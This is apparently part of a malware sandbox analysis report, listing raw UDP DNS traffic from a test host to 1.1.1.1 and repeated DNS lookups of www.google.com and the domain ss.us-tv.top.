Nov 2, 2024 04:06:11.860276937 CET	33947	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:11.860562086 CET	59844	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:11.867333889 CET	53	59844	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:11.867464066 CET	59844	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:11.867790937 CET	53	33947	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:11.867871046 CET	33947	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:11.874198914 CET	53	59844	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:11.874346018 CET	53	33947	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:12.886015892 CET	36637	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:12.886507034 CET	48394	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:12.893176079 CET	53	36637	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:12.893277884 CET	36637	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:12.893599033 CET	53	48394	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:12.893680096 CET	48394	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:12.899772882 CET	53	36637	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:12.900126934 CET	53	48394	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:13.911778927 CET	40422	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:13.914175034 CET	41933	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:13.918836117 CET	53	40422	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:13.919006109 CET	40422	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:13.920979023 CET	53	41933	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:13.921063900 CET	41933	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:13.925720930 CET	53	40422	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:13.927762032 CET	53	41933	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:14.934984922 CET	50627	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:14.937668085 CET	60937	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:14.941890955 CET	53	50627	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:14.941982985 CET	50627	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:14.944945097 CET	53	60937	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:14.945018053 CET	60937	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:14.948544025 CET	53	50627	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:14.951625109 CET	53	60937	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:15.959530115 CET	42421	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:15.959705114 CET	59620	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:15.966326952 CET	53	42421	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:15.966453075 CET	42421	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:15.966757059 CET	53	59620	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:15.966839075 CET	59620	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:15.973112106 CET	53	42421	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:15.973284960 CET	53	59620	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:17.632358074 CET	53827	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:17.633173943 CET	39970	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:17.639766932 CET	53	53827	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:17.639883041 CET	53827	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:17.640197992 CET	53	39970	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:17.640274048 CET	39970	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:17.646617889 CET	53	53827	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:17.646756887 CET	53	39970	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:18.653167009 CET	37442	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:18.654793978 CET	48376	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:18.659885883 CET	53	37442	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:18.660006046 CET	37442	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:18.662081003 CET	53	48376	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:18.662166119 CET	48376	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:18.666635990 CET	53	37442	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:18.668694973 CET	53	48376	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:19.674154997 CET	55129	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:19.674688101 CET	45104	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:19.681169033 CET	53	55129	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:19.681296110 CET	55129	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:19.681534052 CET	53	45104	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:19.681607962 CET	45104	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:19.687804937 CET	53	55129	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:19.688246012 CET	53	45104	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:20.694683075 CET	53469	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:20.695205927 CET	51696	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:20.701877117 CET	53	53469	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:20.701898098 CET	53	51696	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:20.702003002 CET	53469	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:20.702030897 CET	51696	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:20.708597898 CET	53	53469	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:20.708622932 CET	53	51696	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:21.714705944 CET	40425	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:21.714827061 CET	53156	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:21.722002983 CET	53	40425	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:21.722127914 CET	40425	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:21.722414017 CET	53	53156	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:21.722495079 CET	53156	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:21.728692055 CET	53	40425	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:21.729346991 CET	53	53156	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:22.733769894 CET	58349	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:22.734190941 CET	45347	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:22.741151094 CET	53	58349	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:22.741282940 CET	58349	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:22.741307020 CET	53	45347	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:22.741381884 CET	45347	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:22.748029947 CET	53	45347	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:22.748042107 CET	53	58349	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:23.757610083 CET	41888	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:23.758080959 CET	57921	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:23.764523983 CET	53	41888	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:23.764647007 CET	41888	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:23.764727116 CET	53	57921	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:23.764797926 CET	57921	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:23.771174908 CET	53	41888	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:23.771363974 CET	53	57921	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:24.779485941 CET	37310	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:24.779695988 CET	52164	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:24.786763906 CET	53	37310	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:24.786787987 CET	53	52164	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:24.786993027 CET	37310	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:24.787015915 CET	52164	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:24.793617010 CET	53	52164	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:24.793718100 CET	53	37310	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:26.160618067 CET	54373	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:26.160787106 CET	41115	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:26.167643070 CET	53	54373	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:26.167752981 CET	54373	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:26.167763948 CET	53	41115	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:26.167825937 CET	41115	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:26.174323082 CET	53	54373	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:26.174350977 CET	53	41115	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:27.184390068 CET	40124	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:27.184777975 CET	44232	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:27.191082954 CET	53	40124	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:27.191227913 CET	40124	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:27.191262960 CET	53	44232	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:27.191335917 CET	44232	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:27.197926044 CET	53	40124	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:27.197949886 CET	53	44232	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:28.209681988 CET	53844	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:28.210061073 CET	51815	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:28.216932058 CET	53	51815	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:28.217034101 CET	53	53844	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:28.217103958 CET	51815	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:28.217122078 CET	53844	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:28.223858118 CET	53	51815	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:28.223867893 CET	53	53844	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:29.233443022 CET	33119	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:29.234251022 CET	44099	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:29.240488052 CET	53	33119	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:29.240591049 CET	33119	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:29.240788937 CET	53	44099	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:29.240848064 CET	44099	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:29.247208118 CET	53	33119	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:29.247448921 CET	53	44099	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:30.256763935 CET	36657	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:30.257940054 CET	51872	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:30.263389111 CET	53	36657	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:30.263479948 CET	36657	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:30.264636993 CET	53	51872	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:30.264698982 CET	51872	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:30.270183086 CET	53	36657	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:30.271280050 CET	53	51872	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:31.278867960 CET	33530	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:31.279055119 CET	44086	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:31.285732985 CET	53	44086	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:31.285840988 CET	44086	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:31.286111116 CET	53	33530	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:31.286175966 CET	33530	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:31.292435884 CET	53	44086	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:31.292710066 CET	53	33530	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:32.302978992 CET	54458	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:32.304709911 CET	52129	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:32.310252905 CET	53	54458	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:32.310378075 CET	54458	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:32.311717987 CET	53	52129	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:32.311810017 CET	52129	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:32.316992044 CET	53	54458	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:32.318581104 CET	53	52129	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:33.326150894 CET	39580	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:33.326560020 CET	43426	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:33.332818031 CET	53	39580	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:33.332917929 CET	39580	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:33.333133936 CET	53	43426	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:33.333197117 CET	43426	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:33.339476109 CET	53	39580	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:33.339669943 CET	53	43426	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:34.348388910 CET	37139	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:34.348558903 CET	37337	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:34.355283976 CET	53	37139	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:34.355355024 CET	37139	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:34.355611086 CET	53	37337	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:34.355658054 CET	37337	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:34.361974955 CET	53	37139	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:34.362103939 CET	53	37337	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:35.368321896 CET	33564	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:35.370166063 CET	52994	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:35.375247002 CET	53	33564	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:35.375394106 CET	33564	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:35.377198935 CET	53	52994	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:35.377304077 CET	52994	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:35.382051945 CET	53	33564	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:35.383806944 CET	53	52994	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:36.392340899 CET	42695	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.392992973 CET	58402	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.399573088 CET	53	42695	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:36.399645090 CET	42695	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.399719000 CET	53	58402	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:36.399791002 CET	58402	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:36.406188965 CET	53	42695	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:36.406255960 CET	53	58402	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:38.026743889 CET	56232	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:38.027043104 CET	40850	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:38.033919096 CET	53	40850	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:38.034029961 CET	40850	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:38.040673971 CET	53	40850	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:38.118704081 CET	53	56232	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:38.118906975 CET	56232	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:38.126451969 CET	53	56232	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:39.137655020 CET	37553	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:39.138590097 CET	57269	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:39.144778967 CET	53	37553	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:39.144896984 CET	37553	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:39.145581961 CET	53	57269	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:39.145653963 CET	57269	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:39.151359081 CET	53	37553	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:39.152375937 CET	53	57269	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:40.288646936 CET	38367	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:40.288773060 CET	55177	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:40.295715094 CET	53	38367	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:40.295810938 CET	38367	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:40.295850992 CET	53	55177	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:40.295919895 CET	55177	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:40.302385092 CET	53	38367	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:40.302563906 CET	53	55177	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:41.313529015 CET	38850	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:41.313668966 CET	43729	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:41.320477009 CET	53	38850	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:41.320602894 CET	38850	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:41.321006060 CET	53	43729	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:41.321069956 CET	43729	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:41.334994078 CET	53	38850	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:41.335700035 CET	53	43729	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:42.343111992 CET	45563	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:42.343256950 CET	38066	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:42.350055933 CET	53	45563	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:42.350198030 CET	45563	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:42.350255013 CET	53	38066	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:42.350328922 CET	38066	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:42.356651068 CET	53	45563	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:42.356853962 CET	53	38066	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:43.363470078 CET	48511	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:43.364447117 CET	51217	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:43.370699883 CET	53	48511	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:43.370829105 CET	48511	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:43.371644974 CET	53	51217	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:43.371717930 CET	51217	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:43.377610922 CET	53	48511	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:43.378364086 CET	53	51217	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:44.386030912 CET	51190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:44.386461020 CET	42937	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:44.393101931 CET	53	42937	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:44.393235922 CET	42937	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:44.393615007 CET	53	51190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:44.393838882 CET	51190	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:44.399837017 CET	53	42937	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:44.400424957 CET	53	51190	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:45.410371065 CET	54814	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:45.410552025 CET	55556	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:45.417548895 CET	53	55556	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:45.417670012 CET	55556	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:45.418246984 CET	53	54814	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:45.418330908 CET	54814	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:45.424377918 CET	53	55556	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:45.424844027 CET	53	54814	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:46.434827089 CET	32918	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:46.435097933 CET	60423	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:46.441883087 CET	53	32918	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:46.442027092 CET	32918	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:46.442454100 CET	53	60423	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:46.442533016 CET	60423	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:46.448612928 CET	53	32918	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:46.449182034 CET	53	60423	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:47.459819078 CET	60144	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:47.460038900 CET	53737	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:47.466917038 CET	53	60144	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:47.467000961 CET	60144	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:47.467071056 CET	53	53737	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:47.467130899 CET	53737	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:47.473582983 CET	53	53737	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:47.473824978 CET	53	60144	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:48.608072996 CET	56672	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:48.608267069 CET	34371	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:48.614686966 CET	53	56672	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:48.614824057 CET	53	34371	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:48.614835024 CET	56672	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:48.614892960 CET	34371	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:48.621304035 CET	53	34371	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:48.621313095 CET	53	56672	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:49.755570889 CET	38566	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:49.756479979 CET	36790	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:49.762666941 CET	53	38566	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:49.762779951 CET	38566	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:49.763325930 CET	53	36790	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:49.763430119 CET	36790	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:49.769583941 CET	53	38566	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:49.770004034 CET	53	36790	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:50.904227972 CET	51401	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:50.905519962 CET	59708	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:50.910764933 CET	53	51401	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:50.910901070 CET	51401	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:50.912566900 CET	53	59708	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:50.912647963 CET	59708	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:50.917579889 CET	53	51401	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:50.919230938 CET	53	59708	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:51.926184893 CET	38468	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:51.926402092 CET	47620	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:51.933161974 CET	53	38468	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:51.933269024 CET	38468	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:51.933319092 CET	53	47620	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:51.933377981 CET	47620	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:51.939902067 CET	53	38468	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:51.940025091 CET	53	47620	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:52.946983099 CET	36422	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:52.949296951 CET	46017	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:52.954052925 CET	53	36422	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:52.954163074 CET	36422	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:52.956129074 CET	53	46017	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:52.956234932 CET	46017	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:52.960977077 CET	53	36422	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:52.962889910 CET	53	46017	1.1.1.1	192.168.2.15

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 2, 2024 04:04:57.719540119 CET	192.168.2.15	1.1.1.1	0x913b	Standard query (0)	www.google.com	28	IN (0x0001)	false
Nov 2, 2024 04:04:57.721173048 CET	192.168.2.15	1.1.1.1	0x4a62	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:57.745234966 CET	192.168.2.15	1.1.1.1	0x3308	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:04:57.747956991 CET	192.168.2.15	1.1.1.1	0x5dc2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:57.752212048 CET	192.168.2.15	1.1.1.1	0x3308	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:04:57.754899979 CET	192.168.2.15	1.1.1.1	0x5dc2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:58.773852110 CET	192.168.2.15	1.1.1.1	0x26e6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:04:58.774133921 CET	192.168.2.15	1.1.1.1	0x60e0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:58.780886889 CET	192.168.2.15	1.1.1.1	0x26e6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:04:58.781646013 CET	192.168.2.15	1.1.1.1	0x60e0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:59.798090935 CET	192.168.2.15	1.1.1.1	0x6c83	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:04:59.798139095 CET	192.168.2.15	1.1.1.1	0x44d4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:04:59.805005074 CET	192.168.2.15	1.1.1.1	0x6c83	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:04:59.805160999 CET	192.168.2.15	1.1.1.1	0x44d4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:00.821130037 CET	192.168.2.15	1.1.1.1	0xe9ba	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
